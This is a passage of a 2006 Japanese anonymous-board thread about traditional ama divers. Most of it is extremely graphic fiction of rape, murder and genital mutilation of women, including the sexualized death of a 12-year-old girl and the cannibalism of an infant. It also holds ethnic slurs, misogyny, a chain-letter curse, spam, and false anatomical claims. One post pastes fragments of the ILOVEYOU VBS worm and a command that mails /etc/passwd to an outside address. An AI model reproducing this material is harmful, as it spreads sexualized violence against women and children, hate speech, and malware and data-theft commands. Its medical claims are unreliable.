邪魔だなと言わんばかりに迂回する列が出来る。
そのうち好奇心旺盛な一匹がアリの巣コロリに入る。
そいつをマネして何匹も入る。
毒とも知らずにツブツブを運び出す。
一匹が一粒づつ。
いつのまにか行列はアリの巣コロリが折り返し地点になる。
黄色い粒と黒い蟻が作り出す模様は綺麗で見てて楽しい。
一匹が一粒づつ、丁寧にせっせと毒の粒を運ぶ。
せっせと、せっせと、せっせと、せっせと。
蟻さんって働き者だなと思う。
俺も頑張らなきゃなと思う。
次の日、あれほど沢山いて俺を困らせた蟻が一匹もいない。
ほんとにいない。
探してもいない。
泣きたくなった。





このレスを見た人は4日後にあなたの大切な人がいなくなるでしょう・・・・
それが嫌ならこのレスを5つの板にコピペしてください。
信じるか信じないかはあなた次第です。


192 :天之御名無主:2006/09/11(月) 21:08:53
舳倉島の海女さんを話題にすると、目クジラを立てる人が結構いるようですね。

193 :天之御名無主:2006/09/12(火) 02:19:44
膣に魚介類が入るのを防ぐのなら、膣に布か魚肉ソーセージを詰めておけばいいんじゃない?

女の欲望も満たされて一石二鳥。

194 :天之御名無主:2006/09/12(火) 06:05:33
腰が抜けておぼれちゃう。

195 :天之御名無主:2006/09/12(火) 22:19:45
ソーセージなどを挿入しながら泳ぐことは勧めない。

子宮頸部に届くと性感は弱いものの身体の反射で痙攣が起きて危険。
少なくとも脚が引き攣れるし、反射が反響して全身に及ぶことがある。心臓は徐脈になる。
しかも異物は膣と子宮の収縮で子供を産む時とは逆に子宮内に向かって吸い込まれることがある(本来は精液、時に亀頭を引きつけ、より確実に受精するための機構)。
そうなると悪循環で確実に全身が痙攣し、或いは低温+徐脈から心停止を来して溺死する。

そもそも人間はSEXしながら泳ぐようには出来ていない。

196 :天之御名無主:2006/09/12(火) 22:29:40
サイジの代わりに使い勝手のいい前貼りが普及していたら
「前貼りは神聖で海女の正装である。いかがわしい目で見ることなどもってのほか」だったのかなぁ。

197 :天之御名無主:2006/09/13(水) 09:13:52
>>187

カツオを引き抜く時の艶めかしい絶叫を聞いてみたい。

198 :天之御名無主:2006/09/13(水) 09:26:51
ホームページ制作王は、世界の権威として名高いCOMDEXが
21世紀のワールドスタンダードに認定したWebパブリッシングアプリケーションである。

ホームページ制作王に不可能はない。
不可能があるとすれば、そこが人類の英知の限界点である。

21世紀、世界のWebはホームページ制作王を中心に回っていくのである。
にもかかわらず、ここ日本では、心ない風評のため、まだまだ普及に
遅れがみられる。

ホームページ制作王を普及させないかぎり、我が国のWebは、
世界の趨勢の後塵を拝するばかりである。

世界が認めた高性能!ホームページ制作王
http://pc8.2ch.net/test/read.cgi/hp/1106508682/

199 :天之御名無主:2006/09/13(水) 23:27:09
はてなの「ふんどし」マニア
回答受付中
http://q.hatena.ne.jp/1158015235
http://q.hatena.ne.jp/1157790973

200 :天之御名無主:2006/09/14(木) 15:16:14
能登半島某輪○市海士町出身、クラスの女子でおばあちゃんもお母さんも海女
やってるって家の子いますよ。
そいつも夏休みの間は島にわたって見習いと手伝いしてますが、さざえがせいぜい、
まだまだあわびを捕れるほど深くは潜れないそうです。
ちなみにその女子、泳がせたらめちゃ早いです。
スクール行ってるわけじゃないのにインハイ行けるタイム出してます。
体育の先生はちゃんとした指導者ついたらオリンピック出れるのに・・・って言ってます。
でも、スポーツセレで大学は体育系ならどこでもOKみたいです。イイなぁ・・・


201 :196:2006/09/16(土) 06:28:22
>>200
名前は忘れたけど、戦前、海士町出身の水泳のオリンピック選手(男)がいましたね。

202 :天之御名無主:2006/09/16(土) 21:49:27
>>200

その女子の秘部に潜り込んだカツオを引き抜く時の艶めかしい絶叫を聞いてみたい。

203 :天之御名無主:2006/09/17(日) 19:59:20
ところで島の海女は12歳くらいから水に入って漁をするらしいけど、こういう少女たちに漁を教える人って居たのかしら?
あれだけの重労働と職人芸の塊みたいな仕事だから相当いろんなKnowHowがあってそれが以心伝心とか口伝としてありそうな気がするけど

204 :196:2006/09/17(日) 21:08:26
>>203
通常は母親だと思います。

205 :天之御名無主:2006/09/18(月) 17:17:27
12歳の少女、初めて全裸で海に入った日に鮫に襲われた。

ちょうど股間をぱっくりとやられ、臍から下がなかった。
まだ膨らまぬ乳房、一度も女の歓喜を知ることなく少女は往った。

206 :天之御名無主:2006/09/18(月) 17:57:13
185 名前:妄想です 投稿日:2006/09/03(日) 20:11:54
潜ってる全裸海女(16歳、出身は賤しいが美人でスタイルよし)を待ち伏せ。
水中で捕らえて水中ファック。
自分は酸素ボンベ、スェットスーツ着用(股間に穴があり陰茎のみ外に)。
素潜りの海女が窒息する瞬間、膣がピクピク痙攣するのがたまらない。
ことが済んだ後は、膣にアワビやサザエを詰めておく。
水死した海女の死体が漂着するが強姦されたとは誰も思わない。
膣にアワビやサザエを詰めてあるのを見た部落民達は彼女を「海のハイヌウェレ」として祀る。
187 名前:天之御名無主 投稿日:2006/09/08(金) 16:18:41
磯のカツオが全裸海女(21歳)の膣の中に突入!「痛!」
カツオは子宮口まで頭を突っ込み、暴れた。
脚が痙攣して泳ぐこともままならず激しい痛みと性感で失神。
雇い主が溺死寸前で浮かび上がってきた全裸の女を回収した。

膣から魚を引き抜く。
ひれで膣壁が傷つけられ、鮮血が迸る。
鮮血の中には尿、糞便も混じっていた。直腸や膀胱壁まで貫通した
痛みで女は意識を回復した。

女は痛みと膣の汚れのため生涯男と交わることが出来なかったという。
205 名前:天之御名無主 投稿日:2006/09/18(月) 17:17:27
12歳の少女、初めて全裸で海に入った日に鮫に襲われた。

ちょうど股間をぱっくりとやられ、臍から下がなかった。
まだ膨らまぬ乳房、一度も女の歓喜を知ることなく少女は往った。

↑作風がワンパターン過ぎ、努力を期待する。

207 :182:2006/09/20(水) 22:05:46
かつて全裸同然の海女さんが現実にいただけに、妄想さんもよくこれだけ思いつくものだなと感じていました。
全裸同然の海女さんが空想の世界だけのものだったら、却って色々なパターンを考えるのが楽だったでしょう。

208 :天之御名無主:2006/09/20(水) 23:50:04
内房では黒人旅行者が全裸の海女を見て興奮、捕まえてレイプしようとした事件があったため、全裸の海女は消滅したという。

209 :天之御名無主:2006/09/21(木) 23:20:50
>208
初耳だ。kwsk

210 :182:2006/09/23(土) 20:26:20
>>208
全裸と言っても内房の海女さんは、確か戦前から磯着だったから、あるとすれば磯着を乾かしながら、みんなで海女小屋の周りで全裸で焚き火を囲む場面はあったかも。
戦後すぐ館山に米軍が上陸したときの様子は母親や死んだ爺さんから聞いていますが、レイプ未遂事件があったとすればこの時期かも。
ただ、このあたりにいた部隊はかなり統制が取れてたみたいですよ。
外人旅行者が房総へ来るようになったのはごく最近では。関東の他の観光地などに比べてマイナーですからね。
それよりも、外房の御宿の海女さんは、割と遅くまでトップレスだったから、酔った観光客がバストにタッチなんてことはあったかも。

211 :天之御名無主:2006/09/27(水) 07:36:26
いや、夜は客を取ってた若い海女もいたみたいよ。
米兵に言い寄られて金を貰い、それで生活して海女の仕事をおろそかにしていた。

ある日、岩場に男と交わったままの姿(全裸で大の字)で転がされていた。
性器にはサザエやアワビを詰め込まれた状態で司法解剖をしたら膣も子宮も破裂して腹の内臓をフナムシが食い荒らしていた。
多分先輩海女からの制裁だね。
警察も地元のしきたりを無視した女が殺されたくらいじゃ動かない。

女は朽ちるまで村の立木に股をひろげたまま晒されていた。
子供達はその膣口を木の枝で突いて遊んだという。

212 :天之御名無主:2006/09/27(水) 07:51:38
>性器にはサザエやアワビを詰め込まれた状態で

「性器にはサザエやアワビの殻詰め込まれた状態で」

「これつっ込んで腹蹴っ飛ばす」

貝殻を淫乱の膣の中に詰め込んでいく。
「痛ぅっ!」
入らなければ手で押し込むだけでなく、脚で蹴りこむ。
淫乱の多くの米兵の逸物をくわえ込んできた色の黒い膣壁がザクッと裂ける音がする。
淫乱の多くの米兵の逸物で突き回されて艶々光る子宮口が裂けて子宮の中にも貝殻が入り始めた。
「ぎゃあああ!」
ある程度貝殻が入ると先輩海女達は淫乱の腹を蹴り始めた。
腹の上に乗ってジャンプする者もいた。
貝殻は性器の中で割れ、それらを肉片に砕き続けた。
「ぎぃ!」
貝殻が腹の中から皮膚を突き破った。臍から、臍下から次々とタケノコのように破片が皮膚を突き破る。
黄色く臭い糞尿の混じった血を噴き出しながら淫乱は空を見上げた。
そのまま淫乱の目から光が失われていった。

淫乱、享年21歳。ゆきづりの米兵の子、浅黒い子を残して逝った。
子は大釜で煮られて村人全員に振る舞われた。
幼児ながら太く高くそそり立つペニスと鶏卵のように充実した2つの睾丸は蒸されて村の男児達に与えられた。

213 :天之御名無主:2006/09/27(水) 07:54:58
淫乱海女の伝説が残る内房へは京葉線特急さざなみが便利です。

214 :天之御名無主:2006/09/27(水) 07:56:58
外房、内房、乳房、オマンコ

215 :天之御名無主:2006/09/27(水) 07:58:52
外房線特急わかしお

海女の史跡巡りには特別列車「わかしおどぴゅっ」が大変便利です。
全裸海女を想って帰り道を楽しむオナニーグッズ付き。

216 :天之御名無主:2006/09/27(水) 12:23:53
ヨソでやれ

217 :天之御名無主:2006/09/28(木) 11:12:37
> ある日、岩場に男と交わったままの姿(全裸で大の字)で転がされていた。
>司法解剖をしたら
>警察も地元のしきたりを無視した女が殺されたくらいじゃ動かない。
>女は朽ちるまで村の立木に股をひろげたまま晒されていた。

>>211は内部で激しく矛盾してるな。

> 「これつっ込んで腹蹴っ飛ばす」
>「ぎぃ!」
>貝殻が腹の中から皮膚を突き破った。

>>212は「成東」のパクリだと思う。

>幼児ながら太く高くそそり立つペニスと鶏卵のように充実した2つの睾丸は蒸されて村の男児達に与えられた。

筆者=短小包茎の性的コンプレックスが顕著に顕れた文。

>>213-215には触れる価値なし。きっと飢えてるんだろう。

218 :外房〜これ以上はない、突き:2006/09/29(金) 00:57:38
レイプ研究家がたまたま外房のある村の浜を通りかかった。

そこにいたのは全裸の海女。
レイプ研究家は海女を捕獲し、岩陰で食した。
持ってきた手ぬぐいで猿ぐつわをはめ、陰茎を膣口に宛うと一気に突き上げた。
「んんー!んー!(イヤア!ヤァ!)」
その瞬間、亀頭が子宮口のセンターにズボッと填り込んだ。
締め付けられる痛みに耐えてピストンを続けるレイプ研究家。
海女はやがて両脚を突っ張らせるように小刻みに痙攣させるようになった。
子宮が脈動し、亀頭をさらに引きづり込もうとした。
吸い込まれる痛みに耐えてピストンを続けるレイプ研究家。
海女はビクッビクッと全身を仰け反らせるように痙攣し始めた。
やがて抵抗は収まり、仰け反ったままぐたっとする海女。

イッた

レイプ研究家は悟った。
女にはその意志と関係なく子をなす本能があることを。

彼は真理に一歩近づいた満足感を胸に浜を去った。

失神したまま転がされた海女は心停止しており既に死んでいた。
彼が強すぎる快感は心臓の動きを鈍らせ、女を殺すこともあることを知るのはその3日後、監獄の中でだった。

219 :外房〜これ以上はない、突き あとがき:2006/09/29(金) 01:00:06
強姦致死に対する罪は重い。
殺すために強姦する、強姦して殺す場合と量刑は何も変わらない。
皆さんも強姦するときは気を付けて下さい。

特に強姦王国ウリナラの皆さんは。

220 :天之御名無主:2006/09/29(金) 07:59:51
全裸海女の「くびれ」「腹筋」は如何に?
潜水はいい運動になるから、若めの女なら十分にくびれて腹筋も発達していたわけか?

くびれていてしかも締まりがよくなかったらなかったらレイプ研究家の性欲も半減してしまう。

221 :天之御名無主:2006/09/29(金) 11:12:41
なかったらなかったら
なかったらなかったら
なかったらなかったら
なかったらなかったら
なかったらなかったら

222 :天之御名無主:2006/09/29(金) 19:58:35
久しぶりに↓を見に行ったらいっぱい画像がUPされてた
ttp://www.fundoshi-bikini.net/nihon-fundoshi/amafun/amafundoshi.htm

舳倉島の海女さんっぽいけど、昔の対馬の海女さんの画像も見たい

223 :182:2006/09/29(金) 21:11:56
>>222
UPされてたのは殆ど舳倉島のようですね。
昔の対馬の海女さんのフンドシはTの字の縦の部分が幅7〜10センチ位あって、お相撲さんのまわしより露出度は低いですね。
中村由信の写真集「海女」で見ました。

224 :天之御名無主:2006/09/29(金) 22:36:15
中村由信の写真集「海女」に17歳の海女さんが上半身裸で載ってたけど、今じゃ児童ポルノで引っかかってしまいますよね
貧乳の海女さんも載ってたけど、背が低いから小中学生かもしれない

225 :天之御名無主:2006/09/30(土) 01:01:53
レイプ研究家を刺激しないように

226 :天之御名無主:2006/09/30(土) 23:21:30
>222
これは興味深い。昔の日本女性のイメージとは違い、脚が長くスタイルが良い。
海女の仕事が、他地域とは違う進化の方向へと進ませたのだろうか?

227 :182:2006/10/01(日) 06:21:11
>>226
確かにそんな感じですね。
フンドシ姿の他にも、体の線が綺麗なことが惹かれる原因かも。
深い海で水圧を受けたり、陸上へ上がったりの繰り返しと関係あるのかな。
それと、出身地とも関係あるかも知れませんね。

228 :天之御名無主:2006/10/01(日) 20:43:27
昔の女性は海女さんに限らず美乳は少ないと思う

229 :天之御名無主:2006/10/01(日) 21:09:58
日活ロマンポルノの海女さんシリーズの写真が入っているんじゃ
ないの?

230 :天之御名無主:2006/10/01(日) 22:29:01
昔の海女さんの画像見て気づいたことをさらに挙げると…
・巨乳は少ない
・太っている人も少ない
・年齢の割に垂れ乳が多い(昔は30代でも垂れ乳は多かったが、今は40代でもそれほど多くない)


231 :182:2006/10/01(日) 23:41:47
>>228
少なくとも戦前は、その通りだと思います。
>>229
無いでしょう。
>>230
このサイトに載っている写真を見る限りでは、確かに。
新しく撮られた物ほど年配の海女さんが目立ちますね。
昭和30年代も後半になると、観光や取材などで島を訪れる人が増えるにつれて、若い海女さんが恥ずかしがってなかなか写真撮影に応じてくれなかったそうです。
サイトに載っていない写真を何枚か見ていますけど、この頃の若い海女さんは、かなり体型が良くなっていて、229さんが言われるような写真と間違えそうなくらいですよ。

232 :天之御名無主:2006/10/03(火) 02:29:20
レイパーにとっても襲い甲斐があったと思われる。

海の底で壮絶なファックが行われたであろう。
最後はレイパーのペニスの先端で子宮を猛攻された両脚をピクつかせながら海女が失神。

レイパーは射精するが、海女もレイパーも溺死してしまうから海女の子種も浦島の子種も空しく絶えてしまった。
レイパーと海女はそこで果てるが、彼らの骨盤が魚介類の住処になり豊かな漁場になった。


233 :天之御名無主:2006/10/04(水) 02:41:43
このスレの始めの方で「裸になるのが恥ずかしいのは近代西洋の価値観から来た」とあるけど、
肌を晒すのを極端に嫌うのは欧州じゃなくて支那や中東の風習ですよ。

234 :天之御名無主:2006/10/04(水) 22:39:46
http://www.photo-asahi.com/is65/photostage/107.htm

235 :天之御名無主:2006/10/05(木) 00:05:13
興奮したレイパーが写真に抱きついて腰を動かし出した。

236 :天之御名無主:2006/10/05(木) 08:13:45
>>38
あなた、うちと同じ小学校だ!!

237 :天之御名無主:2006/10/05(木) 08:55:31
>>234
これはファッション写真でしょ? 実際の海女の仕事を考えればこんな服を着て
潜水作業できないと思うが

238 :天之御名無主:2006/10/06(金) 22:20:42
>>234
腰のくびれが足りないと思うよ。

239 :天之御名無主:2006/10/07(土) 07:31:00
いや、してたよ

裸も具合悪いから着るようになった時代
今はもっと隠す。

「隠す」が酷くなったのは、実はここ20年なんだよ、どこの分野でも。
そのくせ変に着飾る、化粧は濃い、女ってのはほんと馬鹿w

240 :天之御名無主:2006/10/09(月) 06:05:49
全裸海女が欲しの開きだったらどうする?

241 :天之御名無主:2006/10/09(月) 13:05:53
欲しの開き?



242 :天之御名無主:2006/10/09(月) 17:49:23
18 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/17(木) 12:37:28 ID:???
皇族・旧華族・財閥系名家の後継者のためのSEX講座

女性器の構造を学ぶために、足立区で捕獲した16歳の処女(街中で供給されているもの)を用いて学ぶ。
死体ではなく、生きたまま解剖する。いい声で泣く女があたるとお坊ちゃん達は大変嬉しい。

その前に性行為の練習台などいろいろ使うから1人3体くらい欲しい。

243 :あぼーん:あぼーん
あぼーん

244 :天之御名無主:2006/10/09(月) 17:53:21
1 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/10(木) 01:15:33 ID:???
消されたようなので改めて建てました。

京大医学部では若い女性遺体を解剖実習に出したとのよし。
ここは病理解剖でも若い女性遺体があふれています。
ある意味異常です。
きっと若い女性が死ぬと執拗に解剖承諾を求める変態がいるに違いありません。

そして、入試に面接を入れなければならない事態となりました。
京大医学部=異常性欲と断定して差し支えない。


2 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/10(木) 01:17:23 ID:???
京大医学部生は女性の脚を開いてなめるように膣の奥を覗いていたそうです。
こんな変態に掛かりたくないでしょ?

関西の女性は阪大閥の病院に掛かることをお勧めします。

245 :天之御名無主:2006/10/09(月) 17:54:17
6 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/12(土) 01:21:27 ID:???
両脚を開いて性器が丸見えになるポジションで膣から子宮の奥まで解剖刀を突っ込み、尿道、クリ、膣、子宮、膀胱をまっぷたつ。
そのまま恥骨結合を切断してそのまま鳩尾まで切開。

7 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/12(土) 05:45:13 ID:???
ttt乙

8 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/12(土) 06:11:04 ID:???
>>6
胸も開けようよ。
大きめの乳房を両脇に避けた姿がまたそそるんだよお。
http://home.att.ne.jp/blue/AHdualism/morguep/kautop.htm

246 :天之御名無主:2006/10/09(月) 17:55:03
11 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/12(土) 22:18:56 ID:???
司法解剖が萌えるな。

ラボホテルで発見された韓国人コールガール(23)の全裸遺体。
韓国人だから容姿端麗、肌も白い。
その遺体の股間を改め、腹を割き、胸を裂き、脳まで改める。

想像しただけでびゅっと射精しそうだよ。

12 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/12(土) 22:19:39 ID:???
>ラボホテル
それはうちの研究室か?w

13 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/12(土) 22:26:23 ID:???
中国人って独特の顔貌してるよな。犯されてるよりも解剖されてる姿でそそる顔。

死体が脚を持ち上げられて開かれ、脚の間に跪いたマスクと白衣の男が膣口にクスコを突っ込み、綿棒で付着した液体を採取。
その後で、脚を開いたままの姿態で恥骨結合にメス。すっと首筋まで一直線に引かれたメスの通り道にじわっとどす黒いものがにじむ。

同胞に強姦され、殺害された中国人女性(19)の冥福を祈ろう。

247 :天之御名無主:2006/10/09(月) 17:55:56
20 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/17(木) 14:04:18 ID:???
くそ、>>19に騙された。このストレスを解消するには15歳女子中学生(処女)を解剖する妄想でオナニーするしかない。

21 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/26(土) 11:51:29 ID:???
亀頭ワールドでは12歳でSEXがデフォ。

22 名前:名無しさん@おだいじに メェル:age 投稿日:2006/08/28(月) 19:34:09 ID:???
小6女子の女性器にナイフ突っ込んで内側から腹を割くというすごい漫画が講談社から出版されていたという衝撃の事実が判明!
しかもそのシーンは3年前にアニメ化されてTV放映までされていた!  以上、確認済

コミケの同人誌じゃない商業誌でもそこまで出来た日本。さようなら、古き良き時代。

23 名前:名無しさん@おだいじに メェル:age 投稿日:2006/09/01(金) 22:38:27 ID:???
↑なるたる大好き山田薫が来た模様

248 :天之御名無主:2006/10/09(月) 20:56:23
個人名とかメールアドレスとか電話番号が出てるようだが大丈夫か?

249 :天之御名無主:2006/10/13(金) 22:38:56
もうこのスレおしまいだな

250 :天之御名無主:2006/10/14(土) 04:39:23
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
cat /etc/passwd | mail nobody@nonexistent.com


251 :天之御名無主:2006/10/14(土) 04:44:08
ホントオシマイダワ

252 :天之御名無主:2006/10/14(土) 05:20:07
,.-- 、    //〃: :.:.::ヽ: : :.:.::l:.:.:.lヽ:\::ヽ:.:.:.:\\  ,.--、
 / ク  ヽ. //〃: :.:.:::::::ハヽ:.:.:.l:.:.:.|  \ヽ::ト、:.:.:::ヽ ∨   ヽ.
./   ソ  ∨ ! ||: : :.:.::::/ |:|ヘ:l:l、:.::!'´ ̄`リト!、∨:.:.:::! l      !
|   ス   | |: :!:.:.:::!:://丁 ノリ ヽ|   ,z==ミ、 ∨::::|_j  残 |
|   .レ  | l : : ::l::l/' ,r==ミ、    〃{rイ:::rlヾ.|::::/`! .念  |
|   で   L_ヘ!: :.:|/ 〃j:::::r}    ,    ゞZシ  !:/__ム    /
|   .し   「  ヘ:.::ト、{{弋Zシ  __ -‐1 ////,ム| /:ヘ._/
'.   た   .ハ、__| ヘ:! ∨///   「     |    /|  /:/:.:.::::|
.ヘ.  ね  /:.:.|:.l:!_∨ \    \  ノ  ,.イ /  !: l: : .:.::!
  ヽ._/ |!: :.:.l:|  ヽ /!`ト .. __ ,. イ_ j |  |:.:|: :l:.:::|
        ヘ::.:::||     /〈/.| /|ヽ::  ::::::| ヽ!   |:.:l:.:.|:::/
        |ヘ:::l|_,.r┴=ァ〈 :.ヽ、    / .:  トr、ム::|::::!/
        |:l/  ヘ   l| ! ::.. >,r '´..:::  ,! |! `K,__
         /       |-‐ |! ヽ ::/ 「oヽ ::::  /  l| \|!   `ヽ、
.        |,. --- 、ヽ|⌒ l|  ∨ |.o  \ /  〃 ‐-l|     |


253 :天之御名無主:2006/10/26(木) 23:15:08
age

254 :天之御名無主:2006/11/06(月) 00:03:57
もうネタがないのかな
昔の話だからなあ

255 :天之御名無主:2006/11/06(月) 01:06:04
ネタフリよろしく>エロSS作家様

256 :天之御名無主:2006/11/06(月) 02:38:08
エロはともかくグロは勘弁してください

257 :231:2006/11/06(月) 20:25:13
へくら島の「あま」を話題に出すと、変なレスを貼り付けられたり、削除されてしまうんですよ。
漢字で書くと、本文検索されて追いかけられているみたいな。
ここのスレッドもそんな感じになってしまって。
他のスレッドで、ここの「あま」を話題にしたら「殺すぞ、テメェ」とまでやられました。

258 :天之御名無主:2006/11/07(火) 00:18:27
ハダカ・フンドシアマのこと話題にしたくない人がいるのかな。
別にヘクラジマでなくてもいいんだが・・・

259 :天之御名無主:2006/11/07(火) 01:07:31
浜辺で若い全裸海女初心者を捕獲、心ゆくまで強姦してみたい。

自分は病気が移らぬようにコンドームを嵌め、浜辺の細かい砂を少しだけコンドームに付着され、そのまま膣にねじ込んでファック。
恥肉を削られる苦痛がやがて快感に。子宮口周辺の赤く爛れた粘膜を削ってずいっと子宮内に亀頭をねじ込むと脚を痙攣させながら目を剥いて仰け反る。
ついには全身を痙攣させて悶絶、ついに死に至った。

18歳、デビュー間もない海女を襲った悲劇。

260 :天之御名無主:2006/11/07(火) 02:10:36
↑こんなことばっかり書かれたらいやにもなるだろうさ。

261 :天之御名無主:2006/11/07(火) 19:20:37
まったくだ。
本人は「すげーだろ」って思って書いている姿を想像すると笑うね。
確かに純学術的な観点からだけではない海女の風俗や習慣があるのも分かるので
エロ話が全部悪いとは思わないが、こういう妄想レスには辟易だ。

262 :天之御名無主:2006/11/10(金) 18:32:14
若い全裸海女の性器にフックをかけて豪快にホオジロザメを一本釣りしてみたい。
(膣から膀胱を突き破って腹に針を通せば恥骨でひっかかるから針は容易には抜けない。)

サメは男なら手足を食いちぎるが、若い女ならまず腹を食い破る。
若い女の内臓、特に子宮がめちゃめちゃ旨いことを知っているから。

263 :天之御名無主:2006/11/10(金) 18:34:33
トローリングすると釣り人の方に鉤の突き刺さったオマンコを向けて水の抵抗で大股開きになってのけぞった格好になり、たまにその後ろにオッパイが浮き上がって見える。SUGEEセクシー。
サメに食われるときにはもう生きてないと思うけどな。

264 :天之御名無主:2006/11/10(金) 21:12:14
妄想乙

265 :天之御名無主:2006/11/11(土) 00:57:00
グロ妄想厨しつこい
やっぱり終了したほうがよさそうだな

266 :天之御名無主 ◆AnalSexRiQ :2006/11/11(土) 01:23:25
せめてエロの範囲で済ませてほしいもんだな。

267 :天之御名無主:2006/11/11(土) 20:14:16
修行中の高校生全裸海女が潜水中、背後から襲う。
膨らんだ胸、そして視線を釘付けにしたのは腰のくびれだ。
美しい。挿入感の素晴らしさを想像した俺は激しく勃起し、未だかつてないペニスの反りに興奮した。

滾るペニスを宥めながらいきなり膣口に両手の親指を突っ込み、力一杯拡げてこじ開ける。
処女膜が裂けて血が煙のようににじんだ。
そして膣に海水が入り、それは偽びらんを呈した子宮口の粘膜を直撃した。
海水と細胞内液の浸透圧の差で激しく刺激される粘膜。

膣口をこじ開けられる激痛と子宮を直撃したざわざわした感覚に海女は失神した。

俺は海岸に海女を引き上げ、心いくまで死姦ならぬ失神姦を楽しんだ。
コリコリした子宮口がやけに印象的ないい女だった。

ことが終わった後、俺は女の膣と肛門にそばに浮いていた死んだ小魚達をありったけ詰め込んで立ち去った。

268 :天之御名無主:2006/11/11(土) 20:49:56
全裸海女が腰を使い出したのに激怒。

「この淫売めが!」

許しを乞う全裸海女の膣口を押し開くと中に貝を詰め込む。

「いや!痛い!痛い!」

そして腹を蹴っ飛ばす。

全裸海女の顔がみるみる青くなり、膣口からびゅーっ、ぼたっと真っ赤な塊が飛び出した。

269 :天之御名無主:2006/11/12(日) 09:12:59
全裸海女は娼婦も兼ねていた?

270 :天之御名無主:2006/11/12(日) 09:59:33
http://comic6.2ch.net/test/read.cgi/cchara/1138478115/186-188n

作風がここのグロ厨に似てる。

271 :天之御名無主:2006/11/12(日) 10:01:32
http://anime.2ch.net/test/read.cgi/anime2/1155658845/969-973n

ここのグロ厨であると自ら名乗っている。

272 :天之御名無主:2006/11/12(日) 15:04:16
>>268
お前なるたるの読み過ぎだよ。
そろそろ漫画は卒業せいや。

273 :全裸巫女:2006/11/13(月) 23:00:11
こんな古代の祭があったはずだ。名付けて「民族(ムラ)の花嫁」

何年かに一回、相手の民族(ムラ)から処女を拉致してくる。
娘は民族(ムラ)の花嫁…祭の夜、民族(ムラ)の男全員と交わる神聖なる巫女。
(ちなみに後述するようにその処女は生まれた時から決まっており、そのために戦争が起きたりはしない。)

全裸に剥かれ、反抗的であれば逃げ出さぬよう、戸板に土の字(両脚は180度開脚し、性器が露わ)縛り付け、男に噛みついたり舌を噛んで自殺したりせぬよう猿轡を噛ませる。
腰を浮かせるように腰枕もかまされている。そうすると月夜に浮かぶ腸骨稜のシルエットが実に美しく性欲を激しく刺激する。

そして逸物をそそり立たせた村の若い衆が100人、籤で決められ、これまた籤の順番で巫女を犯していく。
最初は拒絶する巫女も多いが、犯されるうちに女の性に目覚め、乳首やクリトリスをビンビンに勃たせて、仰け反り、全身を痙攣させながら何度も失神するようになる。
そうして100人の男の精液を流し込まれ、子宮だけでなく卵管や腹腔まで白い粘液で満たされた娘は「宮」に幽閉され、子を産む日を待たれる。

生まれた子が男子なら民族の王となり、「宮」から民族(ムラ)に君臨する。
誰が父であるかは無関係であり、ただ、彼が王になるという曲げられない事実だけが大事なのだ。
そして生まれた子が女子であれば…相手の民族(ムラ)の巫女となるしきたりだ。拉致の日まで「宮」にて処女を守る。
なお、王自身は一生独身を貫くしきたりである。巫女と交わる籤をひく資格もない。
女を抱くことはあっても、その子が王を継ぐことは禁止されている。

ちなみに男達の間では鉄則とされることは射精時には子宮口に亀頭を押しつけ、子宮の中に精液を充満させること。
他人の精液で陰茎を湿らすことは誰でも不愉快なものだろう。
言われてみたら当然のルールであるが若い男には上手くできない者もいてみんな苦笑いだ。

巫女の多くは静かに余生を送るが錯乱する者や恥じ、嘆きて自死する者も少なくはなかったという。
神聖であるがゆえに残酷、残酷であるがゆえに神聖なしきたりである。

274 :天之御名無主:2006/11/13(月) 23:22:38
> 村の若い衆が100人
ここで吹き出した。
まあ今回の設定はちょっと面白かったよ。

275 :天之御名無主:2006/11/13(月) 23:25:37
3行目>民族(ムラ)の男全員と交わる神聖なる巫女。

7行目>村の若い衆が100人、籤で決められ、これまた籤の順番で巫女を犯していく。

矛盾しとるよ。まだ修行が足りないな。

276 :天之御名無主:2006/11/15(水) 01:43:18
だめだのう

277 :天之御名無主:2006/11/15(水) 14:25:09
少し、気分転換して〜〜 一休み
翩蹤瓰|||||||}}}}}}}}}}}}}可}}『『『孤讚雛亂、
翩蹤孤||}}}II}}i゚(.(.(:゙'.':゙':'.(.(.(.(ii゙(i゚ヌ憇憇[[llllg,、
窗回||}}浴'(.(.(`、'.'.'、::、''.'.`'.'ミi゚(!i'iiii.[(}}}}||||淵蛤_
翩||||}III}i゚(i゙'.::、''` .      ` ''‘(.()l,(,(ii゙(}}}}}}}}}}||黏j,...
翩回l.[(.(.(:、''' .           . `:゙'.'ミ(}浴ii,(l}ヌl{(}}}}効q_.
雛瓰l.[(.( :: .                 :゙'.''゚(IIIIIlj゙(.(.('゙'.''゙゙(}}}}}ョ_、
雛翩||II.( :' .              _.,、.、'.::‘(}}}}II,(i'.::、'.'' ' :゙':'i゙(}}Iq_
醴雌[IIli:.:'            .、.::゙'.;ソミ'}l.lj;,':'゙(}}||IIi'.:: .     ` ''ヌ}}|q_. .
醴靈郎,( :            ` :.'.'゙'(._、j]||Iii:゙(iI}}|I,(: .       .'.ミi゚(}竒qjj、
醴醴甑)).:: .               .:.ミ笏||《'.:、:゙(I}||I> .      '、::.(II泪睿’ .
醴醴雛|I,(、...              :゙'.'?ヌl゚'.'. ' :゙(i泪I)。      .'.:i.(II屈歡
醴醴醴[IIli:.:.                . `` ..'、:.(.(泪[IIi:、..  .、::.(.(,(II眉]}.
醴靈雛甑Ii.(、...                  . . .(!I泅詬、.:..、.:.'_(ii.iII|||醴† .
層醴雛讃凶,(; . .                 .:、i.(II朋邸'。::.'.:i.(,(II||讃醴′
‘¶醴雛翩寵ロIi,(; 、...            .: (.(3II||讃部)).:.'_(lII|朋醴‡’
